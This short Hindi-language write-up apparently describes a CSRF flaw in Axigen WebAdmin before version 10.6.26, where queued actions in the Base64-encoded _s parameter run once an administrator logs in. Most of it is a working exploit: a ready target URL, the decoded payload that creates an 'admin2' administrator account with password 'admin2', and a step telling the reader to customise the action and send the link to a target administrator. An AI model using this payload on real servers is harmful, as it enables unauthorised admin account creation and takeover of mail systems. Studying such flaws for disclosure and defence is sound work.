
Axigen WebAdmin CSRF Vulnerability
Axigen WebAdmin इंटरफ़ेस में महत्वपूर्ण स्थिति-परिवर्तन करने वाली क्रियाएं GET अनुरोधों के माध्यम से सुलभ हैं। जबकि _h टोकन प्रत्यक्ष CSRF से बचाता है, एप्लिकेशन उपयोगकर्ता के प्रमाणीकरण के तुरंत बाद _s (ब्रेडक्रंब) पैरामीटर के माध्यम से कतारबद्ध अनुरोधों को संसाधित करता है।
एक हमलावर _s पैरामीटर में Base64-एन्कोडेड पेलोड वाला एक URL बना सकता है। यदि कोई प्रशासक इस लिंक पर क्लिक करता है और लॉगिन प्रक्रिया पूरी करता है, तो कतारबद्ध क्रिया स्वचालित रूप से उसके संदर्भ में निष्पादित हो जाती है।
प्रभावित संस्करण: < 10.6.26
अधिक जानकारी के लिए, Axigen Knowledge Base देखें।
लक्ष्य URL:
https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19
डिकोड किया गया पेलोड (_s पैरामीटर):
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}
_s पैरामीटर के मान को बदलें और इसे लक्ष्य प्रशासक को भेजें।admin2 खाता बन जाता है (या आपकी कस्टम क्रिया निष्पादित होती है)।